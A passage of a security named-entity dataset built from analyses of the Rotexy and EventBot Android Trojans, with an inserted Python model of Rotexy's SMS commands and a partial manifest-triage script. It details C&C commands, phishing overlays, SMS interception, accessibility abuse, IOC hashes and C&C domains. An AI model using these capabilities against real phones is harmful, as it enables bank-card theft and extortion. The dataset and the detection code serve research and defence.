the cycle of requesting administrator privileges .", "spans": {}, "info": {"id": "cyner_valid_000180", "source": "cyner_valid"}} {"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation – in this case , it relaunches ; sending of an SMS by the app – in this case , the phone is switched to silent mode .", "spans": {"Malware: Rotexy": [[198, 204]]}, 
"info": {"id": "cyner_valid_000181", "source": "cyner_valid"}} {"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner .", "spans": {"Malware: Rotexy": [[67, 73]]}, "info": {"id": "cyner_valid_000182", "source": "cyner_valid"}} {"text": "Depending on the Trojan version , dynamically generated subdomains can also be used .", "spans": {}, "info": {"id": "cyner_valid_000183", "source": "cyner_valid"}} {"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database .", "spans": {}, "info": {"id": "cyner_valid_000184", "source": "cyner_valid"}} {"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C .", "spans": {"Malware: Rotexy": [[212, 218]]}, "info": {"id": "cyner_valid_000185", "source": "cyner_valid"}} {"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn ’ t notice that a new SMS has arrived .", "spans": {}, "info": {"id": "cyner_valid_000186", "source": "cyner_valid"}} {"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message .", "spans": {}, "info": {"id": "cyner_valid_000187", "source": "cyner_valid"}} {"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address .", "spans": {}, "info": {"id": "cyner_valid_000188", "source": "cyner_valid"}} {"text": ") If the application hasn ’ t received instructions about the rules for processing 
incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C .", "spans": {}, "info": {"id": "cyner_valid_000189", "source": "cyner_valid"}} {"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C .", "spans": {}, "info": {"id": "cyner_valid_000190", "source": "cyner_valid"}} {"text": "It ’ s possible the threat actors use this list to find running antivirus or banking applications .", "spans": {}, "info": {"id": "cyner_valid_000191", "source": "cyner_valid"}} {"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART — start , stop , restart SuperService .", "spans": {"Malware: Rotexy": [[0, 6]]}, "info": {"id": "cyner_valid_000192", "source": "cyner_valid"}} {"text": "URL — update C & C address .", "spans": {}, "info": {"id": "cyner_valid_000193", "source": "cyner_valid"}} {"text": "MESSAGE – send SMS containing specified text to a specified number .", "spans": {}, "info": {"id": "cyner_valid_000194", "source": "cyner_valid"}} {"text": "UPDATE_PATTERNS – reregister in the administration panel .", "spans": {}, "info": {"id": "cyner_valid_000195", "source": "cyner_valid"}} {"text": "UNBLOCK – unblock the telephone ( revoke device administrator privileges from the app ) .", "spans": {}, "info": {"id": "cyner_valid_000196", "source": "cyner_valid"}} {"text": "UPDATE – download APK file from C & C and install it .", "spans": {}, "info": {"id": "cyner_valid_000197", "source": "cyner_valid"}} {"text": "This command can be used not just to update the app but to install any other software on the infected device .", "spans": {}, "info": {"id": "cyner_valid_000198", "source": "cyner_valid"}} {"text": "CONTACTS – send text received from C & C to all user contacts .", "spans": {}, "info": {"id": "cyner_valid_000199", "source": "cyner_valid"}} {"text": "This is most probably how the application 
spreads .", "spans": {}, "info": {"id": "cyner_valid_000200", "source": "cyner_valid"}} {"text": "CONTACTS_PRO – request unique message text for contacts from the address book .", "spans": {}, "info": {"id": "cyner_valid_000201", "source": "cyner_valid"}} {"text": "PAGE – contact URL received from C & C using User-Agent value that was also received from C & C or local database .", "spans": {}, "info": {"id": "cyner_valid_000202", "source": "cyner_valid"}} {"text": "ALLMSG – send C & C all SMSs received and sent by user , as stored in phone memory .", "spans": {}, "info": {"id": "cyner_valid_000203", "source": "cyner_valid"}} {"text": "ALLCONTACTS – send all contacts from phone memory to C & C .", "spans": {}, "info": {"id": "cyner_valid_000204", "source": "cyner_valid"}} {"text": "ONLINE – send information about Trojan ’ s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc .", "spans": {}, "info": {"id": "cyner_valid_000205", "source": "cyner_valid"}} {"text": "NEWMSG – write an SMS to the device memory containing the text and sender number sent from C & C .", "spans": {}, "info": {"id": "cyner_valid_000206", "source": "cyner_valid"}} {"text": "CHANGE_GCM_ID – change GCM ID .", "spans": {}, "info": {"id": "cyner_valid_000207", "source": "cyner_valid"}} {"text": "BLOCKER_BANKING_START – display phishing HTML page for entry of bank card details .", "spans": {}, "info": {"id": "cyner_valid_000208", "source": "cyner_valid"}} {"text": "BLOCKER_EXTORTIONIST_START – display HTML page of the ransomware .", "spans": {}, "info": {"id": "cyner_valid_000209", "source": "cyner_valid"}} {"text": "BLOCKER_UPDATE_START – display fake HTML page for update .", "spans": {}, "info": {"id": "cyner_valid_000210", "source": "cyner_valid"}} {"text": "BLOCKER_STOP – block display of all HTML pages .", "spans": {}, "info": {"id": "cyner_valid_000211", "source": "cyner_valid"}} {"text": "The C 
& C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs .", "spans": {"Malware: Rotexy": [[19, 25]]}, "info": {"id": "cyner_valid_000212", "source": "cyner_valid"}} {"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : “ 3458 ” — revoke device administrator privileges from the app ; “ hi ” , “ ask ” — enable and disable mobile internet ; “ privet ” , “ ru ” — enable and disable Wi-Fi ; “ check ” — send text “ install : [ device IMEI ] ” to phone number from which SMS was sent ; “ stop_blocker ” — stop displaying all blocking HTML pages ; “ 393838 ” — change C & C address to that specified in the", "spans": {}, "info": {"id": "cyner_valid_000213", "source": "cyner_valid"}} {"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C .", "spans": {"Malware: Rotexy": [[43, 49]]}, "info": {"id": "cyner_valid_000215", "source": "cyner_valid"}} {"text": "The server then sends a reply that contains instructions on further actions to be taken .", "spans": {}, "info": {"id": "cyner_valid_000216", "source": "cyner_valid"}} {"text": "Displaying HTML pages We ’ ll now look at the HTML pages that Rotexy displays and the actions performed with them .", "spans": {"Malware: Rotexy": [[62, 68]]}, "info": {"id": "cyner_valid_000217", "source": "cyner_valid"}} {"text": "The Trojan displays a fake HTML update page ( update.html ) that blocks the device ’ s screen for a long period of time .", "spans": {}, "info": {"id": "cyner_valid_000218", "source": "cyner_valid"}} {"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it .", "spans": {}, "info": {"id": "cyner_valid_000219", "source": "cyner_valid"}} {"text": "The sexually explicit images in this screenshot have been covered with a black box .", "spans": {}, "info": {"id": "cyner_valid_000220", "source": "cyner_valid"}} 
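The SMS command set just listed is the part of Rotexy's control channel a defender can act on, so it is modelled here as a small state machine. This is an added example for this page, not code recovered from the Trojan: the command strings and their effects (including silencing the phone and switching the screen off on every incoming SMS) come from the analysis above, while the device-state fields, the sample IMEI and the way the address following "393838" is taken from the message body (the page's sentence is cut off at that point) are assumptions of the example. `unblock_sequence` sends the two recovery commands in the order the analysis gives: "3458" first, then "stop_blocker".

```python
"""Model of Rotexy's SMS command channel as the analysis describes it.

Added illustration for this page, not code recovered from the Trojan. The
command strings ("3458", "hi", "ask", "privet", "ru", "check", "stop_blocker",
"393838") and the side effects on silent mode and the screen come from the
text; the device-state fields, the sample IMEI and the way the new C&C
address is read from the "393838" message are constructed assumptions.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class InfectedDevice:
    imei: str = "356938035643809"              # constructed sample IMEI
    c2_address: str = "http://sky-sync.pw"     # domain from the IOC list
    device_admin: bool = True                  # Trojan holds admin rights
    blocker_page: Optional[str] = "bank.html"  # HTML page currently shown
    mobile_data: bool = True
    wifi: bool = True
    silent: bool = False
    screen_on: bool = True
    sent_sms: List[Tuple[str, str]] = field(default_factory=list)
    intercepted: List[Tuple[str, str]] = field(default_factory=list)


def handle_sms(dev: InfectedDevice, sender: str, body: str) -> bool:
    """Process one incoming SMS. Returns True when the body was a command."""
    # Every incoming SMS: silence the phone and switch the screen off so the
    # victim does not notice it (behaviour described in the C&C section).
    dev.silent = True
    dev.screen_on = False

    cmd = body.strip()
    if cmd == "3458":               # revoke device administrator privileges
        dev.device_admin = False
    elif cmd in ("hi", "ask"):      # mobile internet on / off
        dev.mobile_data = cmd == "hi"
    elif cmd in ("privet", "ru"):   # Wi-Fi on / off
        dev.wifi = cmd == "privet"
    elif cmd == "check":            # reply "install:<IMEI>" to the sender
        dev.sent_sms.append((sender, f"install:{dev.imei}"))
    elif cmd == "stop_blocker":     # stop displaying blocking HTML pages
        dev.blocker_page = None
    elif cmd.startswith("393838"):  # change C&C address; the page's sentence
        # is cut off here, so using the rest of the SMS as the new address is
        # an assumption of this example. An empty remainder leaves the bot
        # with an unusable address, i.e. cut off from the real C&C.
        dev.c2_address = cmd[len("393838"):].strip()
    else:
        # Not a command: with no templates, the SMS is stored for upload.
        dev.intercepted.append((sender, body))
        return False
    return True


def unblock_sequence(dev: InfectedDevice, operator: str = "+10000000000") -> dict:
    """Recovery in the order the analysis gives: revoke admin rights, then
    dismiss the blocking page. Returns the two indicators that matter."""
    handle_sms(dev, operator, "3458")
    handle_sms(dev, operator, "stop_blocker")
    return {"device_admin": dev.device_admin, "blocker_page": dev.blocker_page}


if __name__ == "__main__":
    d = InfectedDevice()
    handle_sms(d, "+15550100", "check")
    print(d.sent_sms)           # [('+15550100', 'install:356938035643809')]
    print(unblock_sequence(d))  # {'device_admin': False, 'blocker_page': None}
```

In a triage of a suspected infection, the same command strings are what to look for in the device's SMS history: the Trojan consumes them without showing the user anything, so their presence in the operator's message logs but absence from the inbox is itself an indicator.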
{"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details .", "spans": {}, "info": {"id": "cyner_valid_000221", "source": "cyner_valid"}} {"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information .", "spans": {}, "info": {"id": "cyner_valid_000222", "source": "cyner_valid"}} {"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers .", "spans": {}, "info": {"id": "cyner_valid_000223", "source": "cyner_valid"}} {"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account .", "spans": {}, "info": {"id": "cyner_valid_000225", "source": "cyner_valid"}} {"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command .", "spans": {}, "info": {"id": "cyner_valid_000226", "source": "cyner_valid"}} {"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number .", "spans": {"Malware: Rotexy": [[96, 102]]}, "info": {"id": "cyner_valid_000227", "source": "cyner_valid"}} {"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits .", "spans": {}, "info": {"id": "cyner_valid_000228", "source": "cyner_valid"}} {"text": "If the user has provided the details of another card , then the following window is displayed : The application leaves the user with almost no option but to enter the correct card number , as it checks the entered number against the bank card details the cybercriminals received earlier .", "spans": {}, "info": {"id": "cyner_valid_000229", "source": 
"cyner_valid"}} {"text": "How to unblock the phone Now for some good news : Rotexy doesn ’ t have a very well-designed module for processing commands that arrive in SMSs .", "spans": {"Malware: Rotexy": [[50, 56]]}, "info": {"id": "cyner_valid_000231", "source": "cyner_valid"}} {"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages .", "spans": {}, "info": {"id": "cyner_valid_000232", "source": "cyner_valid"}} {"text": "This is done by sending “ 3458 ” in an SMS to the blocked device – this will revoke the administrator privileges from the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000233", "source": "cyner_valid"}} {"text": "After that it ’ s necessary to send “ stop_blocker ” to the same number – this will disable the display of HTML pages that extort money and block the screen .", "spans": {}, "info": {"id": "cyner_valid_000234", "source": "cyner_valid"}} {"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program .", "spans": {"Malware: Rotexy": [[0, 6]]}, "info": {"id": "cyner_valid_000235", "source": "cyner_valid"}} {"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000236", "source": "cyner_valid"}} {"text": "In that case , you first need to send the text “ 393838 ” in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to “ : // ” , so the phone will no longer receive commands from the real C & C .", "spans": {}, "info": {"id": "cyner_valid_000237", "source": "cyner_valid"}} {"text": "However , it ’ s possible the set of commands may change in future versions of the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000239", "source": "cyner_valid"}} {"text": "Geography of Rotexy attacks 
According to our data , 98 % of all Rotexy attacks target users in Russia .", "spans": {"Malware: Rotexy": [[13, 19], [64, 70]]}, "info": {"id": "cyner_valid_000240", "source": "cyner_valid"}} {"text": "Indeed , the Trojan explicitly targets Russian-speaking users .", "spans": {}, "info": {"id": "cyner_valid_000241", "source": "cyner_valid"}} {"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected .", "spans": {}, "info": {"id": "cyner_valid_000242", "source": "cyner_valid"}} {"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386", "spans": {}, "info": {"id": "cyner_valid_000244", "source": "cyner_valid"}} {"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84", "spans": {}, "info": {"id": "cyner_valid_000245", "source": "cyner_valid"}} {"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby.ru darkclub.net holerole.org googleapis.link 2015–2016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw", "spans": {}, "info": {"id": "cyner_valid_000246", "source": "cyner_valid"}} {"text": "2016 freedns.website streamout.space 2017–2018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 .", "spans": {"Malware: EventBot": [[94, 102], [217, 225]], 
"Organization: Cybereason Nocturnus": [[174, 194]], "System: Android": [[242, 249]]}, "info": {"id": "cyner_valid_000247", "source": "cyner_valid"}} {"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more .", "spans": {"System: Paypal Business": [[41, 56]], "System: Revolut": [[59, 66]], "System: Barclays": [[69, 77]], "System: UniCredit": [[80, 89]], "System: CapitalOne UK": [[92, 105]], "System: HSBC UK": [[108, 115]], "System: Santander UK": [[118, 130]], "System: TransferWise": [[133, 145]], "System: Coinbase": [[148, 156]], "System: paysafecard": [[159, 170]]}, "info": {"id": "cyner_valid_000250", "source": "cyner_valid"}} {"text": "It specifically targets financial banking applications across the United States and Europe , including Italy , the UK , Spain , Switzerland , France , and Germany .", "spans": {}, "info": {"id": "cyner_valid_000251", "source": "cyner_valid"}} {"text": "The full list of banking applications targeted is included in the appendix .", "spans": {}, "info": {"id": "cyner_valid_000252", "source": "cyner_valid"}} {"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications .", "spans": {}, "info": {"id": "cyner_valid_000254", "source": "cyner_valid"}} {"text": "This research gives a rare look into the process improvements malware authors make when optimizing before launch .", "spans": {}, "info": {"id": "cyner_valid_000255", "source": "cyner_valid"}} {"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware .", "spans": {}, "info": {"id": "cyner_valid_000256", "source": "cyner_valid"}} {"text": "TABLE OF CONTENTS Security Recommendations 
Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources .", "spans": {"Malware: EventBot": [[194, 202]], "Organization: MITRE": [[272, 277]]}, "info": {"id": "cyner_valid_000257", "source": "cyner_valid"}} {"text": "Keep Google Play Protect on .", "spans": {"System: Google Play Protect": [[5, 24]]}, "info": {"id": "cyner_valid_000258", "source": "cyner_valid"}} {"text": "Do not download mobile apps from unofficial or unauthorized sources .", "spans": {}, "info": {"id": "cyner_valid_000259", "source": "cyner_valid"}} {"text": "Most legitimate Android apps are available on the Google Play Store .", "spans": {"System: Android": [[16, 23]], "System: Google Play Store": [[50, 67]]}, "info": {"id": "cyner_valid_000260", "source": "cyner_valid"}} {"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests .", "spans": {}, "info": {"id": "cyner_valid_000261", "source": "cyner_valid"}} {"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device .", "spans": {"Organization: VirusTotal": [[65, 75]]}, "info": {"id": "cyner_valid_000262", "source": "cyner_valid"}} {"text": "Use mobile threat detection solutions for enhanced security .", "spans": {}, "info": {"id": "cyner_valid_000263", "source": "cyner_valid"}} {"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 .", "spans": {"Organization: Cybereason Nocturnus": [[42, 62]], "System: Android": [[105, 112]], "Malware: EventBot": [[128, 136]]}, "info": 
{"id": "cyner_valid_000264", "source": "cyner_valid"}} {"text": "This malware appears to be newly developed with code that differs significantly from previously known Android malware .", "spans": {"System: Android": [[102, 109]]}, "info": {"id": "cyner_valid_000265", "source": "cyner_valid"}} {"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000266", "source": "cyner_valid"}} {"text": "EventBot abuses Android ’ s accessibility feature to access valuable user information , system information , and data stored in other applications .", "spans": {"Malware: EventBot": [[0, 8]], "System: Android": [[16, 23]]}, "info": {"id": "cyner_valid_000267", "source": "cyner_valid"}} {"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms .", "spans": {"Malware: EventBot": [[16, 24]]}, "info": {"id": "cyner_valid_000268", "source": "cyner_valid"}} {"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[49, 57]]}, "info": {"id": "cyner_valid_000269", "source": "cyner_valid"}} {"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data .", "spans": {"Malware: Eventbot": [[38, 46]]}, "info": {"id": "cyner_valid_000270", "source": "cyner_valid"}} {"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place .", "spans": {}, "info": {"id": "cyner_valid_000271", 
"source": "cyner_valid"}} {"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data .", "spans": {}, "info": {"id": "cyner_valid_000272", "source": "cyner_valid"}} {"text": "EventBot mobile banking applications targetedApplications targeted by EventBot .", "spans": {"Malware: EventBot": [[0, 8], [70, 78]]}, "info": {"id": "cyner_valid_000273", "source": "cyner_valid"}} {"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot .", "spans": {"Organization: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[64, 72]]}, "info": {"id": "cyner_valid_000274", "source": "cyner_valid"}} {"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application .", "spans": {"Malware: EventBot": [[38, 46], [126, 134]], "System: Google Play": [[71, 82]]}, "info": {"id": "cyner_valid_000275", "source": "cyner_valid"}} {"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications .", "spans": {}, "info": {"id": "cyner_valid_000276", "source": "cyner_valid"}} {"text": "Icons used for EventBot masqueraded as legitimate with these icons.application .", "spans": {"Malware: EventBot": [[15, 23]]}, "info": {"id": "cyner_valid_000277", "source": "cyner_valid"}} {"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 .", "spans": {"Organization: Cybereason Nocturnus": [[25, 45]], "Malware: EventBot": [[70, 78]]}, "info": {"id": "cyner_valid_000278", "source": "cyner_valid"}} {"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 .", "spans": {"Malware: EventBot": 
[[60, 68]]}, "info": {"id": "cyner_valid_000280", "source": "cyner_valid"}} {"text": "Each version expands the bot ’ s functionality and works to obfuscate the malware against analysis .", "spans": {}, "info": {"id": "cyner_valid_000281", "source": "cyner_valid"}} {"text": "In this research , we review common features of the malware and examine the improvements the threat actor made in each version .", "spans": {}, "info": {"id": "cyner_valid_000282", "source": "cyner_valid"}} {"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps .", "spans": {"Malware: EventBot": [[45, 53]]}, "info": {"id": "cyner_valid_000283", "source": "cyner_valid"}} {"text": "READ_EXTERNAL_STORAGE - read from external storage .", "spans": {}, "info": {"id": "cyner_valid_000284", "source": "cyner_valid"}} {"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages .", "spans": {}, "info": {"id": "cyner_valid_000285", "source": "cyner_valid"}} {"text": "INTERNET - open network sockets .", "spans": {}, "info": {"id": "cyner_valid_000286", "source": "cyner_valid"}} {"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - whitelist the app to allow it to ignore battery optimizations .", "spans": {}, "info": {"id": "cyner_valid_000287", "source": "cyner_valid"}} {"text": "ACCESS_NETWORK_STATE - allow the app to access information about networks .", "spans": {}, "info": {"id": "cyner_valid_000289", "source": "cyner_valid"}} {"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background .", "spans": {}, "info": {"id": "cyner_valid_000290", "source": "cyner_valid"}} {"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background .", "spans": {}, "info": {"id": "cyner_valid_000291", "source": "cyner_valid"}} {"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot .", 
"spans": {}, "info": {"id": "cyner_valid_000292", "source": "cyner_valid"}} {"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000293", "source": "cyner_valid"}} {"text": "RECEIVE_SMS - allow the application to receive text messages .", "spans": {}, "info": {"id": "cyner_valid_000294", "source": "cyner_valid"}} {"text": "READ_SMS - allow the application to read text messages .", "spans": {}, "info": {"id": "cyner_valid_000295", "source": "cyner_valid"}} {"text": "EventBot permissions EventBot ’ s permissions as seen in the manifest file .", "spans": {"Malware: EventBot": [[0, 8], [21, 29]]}, "info": {"id": "cyner_valid_000296", "source": "cyner_valid"}} {"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services .", "spans": {"Malware: EventBot": [[50, 58]]}, "info": {"id": "cyner_valid_000297", "source": "cyner_valid"}} {"text": "Initial request by EventBot Initial request by EventBot to run as a service .", "spans": {"Malware: EventBot": [[19, 27], [47, 55]]}, "info": {"id": "cyner_valid_000298", "source": "cyner_valid"}} {"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows .", "spans": {}, "info": {"id": "cyner_valid_000299", "source": "cyner_valid"}} {"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher .", "spans": {"System: Android": [[31, 38]], "Malware: EventBot": [[41, 49]]}, "info": {"id": "cyner_valid_000301", "source": "cyner_valid"}} {"text": "EventBot requests permissions to always run in the background .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000302", "source": "cyner_valid"}} 
{"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets .", "spans": {"Malware: EventBot": [[96, 104], [139, 147]]}, "info": {"id": "cyner_valid_000303", "source": "cyner_valid"}} {"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 .", "spans": {"Malware: EventBot": [[93, 101]]}, "info": {"id": "cyner_valid_000304", "source": "cyner_valid"}} {"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 .", "spans": {}, "info": {"id": "cyner_valid_000305", "source": "cyner_valid"}} {"text": "The RC4 key is hardcoded in EventBot .", "spans": {"Malware: EventBot": [[28, 36]]}, "info": {"id": "cyner_valid_000306", "source": "cyner_valid"}} {"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot ’ s configuration , which contains C2 URLs and a targeted applications list .", "spans": {"Malware: EventBot": [[83, 91]]}, "info": {"id": "cyner_valid_000307", "source": "cyner_valid"}} {"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 .", "spans": {"Malware: EventBot": [[10, 18], [43, 51]]}, "info": {"id": "cyner_valid_000308", "source": "cyner_valid"}} {"text": "This version includes 185 different applications , including official applications of worldwide banks .", "spans": {}, "info": {"id": "cyner_valid_000310", "source": "cyner_valid"}} {"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain .", "spans": {}, "info": {"id": "cyner_valid_000311", "source": "cyner_valid"}} {"text": "In addition to official banking 
applications , the target list includes 111 other global financial applications for banking and credit card management , money transfers , and cryptocurrency wallets and exchanges .", "spans": {}, "info": {"id": "cyner_valid_000313", "source": "cyner_valid"}} {"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more .", "spans": {"System: Paypal Business": [[23, 38]], "System: Revolut": [[41, 48]], "System: Barclays": [[51, 59]], "System: UniCredit": [[62, 71]], "System: CapitalOne UK": [[74, 87]], "System: HSBC UK": [[90, 97]], "System: Santander UK": [[100, 112]], "System: TransferWise": [[115, 127]], "System: Coinbase": [[130, 138]], "System: paysafecard": [[141, 152]]}, "info": {"id": "cyner_valid_000314", "source": "cyner_valid"}} {"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity .", "spans": {"Malware: EventBot": [[32, 40]], "System: Android": [[78, 85]]}, "info": {"id": "cyner_valid_000316", "source": "cyner_valid"}} {"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot .", "spans": {"Malware: EventBot": [[135, 143]]}, "info": {"id": "cyner_valid_000318", "source": "cyner_valid"}} {"text": "EventBot uses multiple methods to exploit accessibility events for webinjects and other information stealing purposes .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000319", "source": "cyner_valid"}} {"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000322", "source": "cyner_valid"}} {"text": "In later versions , another encryption layer is added using Curve25519 encryption .", "spans": {}, "info": 
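The permission list given under COMMON FEATURES above is a recognisable banker profile: SMS read/receive for one-time codes, SYSTEM_ALERT_WINDOW for overlays, REQUEST_INSTALL_PACKAGES for dropping further payloads, boot and battery-optimisation permissions for persistence, plus an accessibility service for the keylogging and webinjects. The following is an added triage example for this page, not Cybereason's tooling: it parses a decoded manifest with the standard library and scores those combinations. The manifest text, the package names and the scoring rules are constructed for the example; the permission names are the ones the analysis lists, and the `BIND_ACCESSIBILITY_SERVICE` service declaration is the standard way an app registers the accessibility service the text says EventBot asks the user to enable.

```python
"""Manifest triage for the permission profile listed in the EventBot analysis.

Added example for this page, not Cybereason's code. The manifests below are
constructed (decoded text form, as apktool emits it); the scoring rules are
this example's own heuristics.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree's form of the android: attribute prefix

# Constructed manifest carrying the permission set from the analysis plus an
# accessibility-service declaration. Package name is a placeholder.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.update">
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.REQUEST_COMPANION_RUN_IN_BACKGROUND"/>
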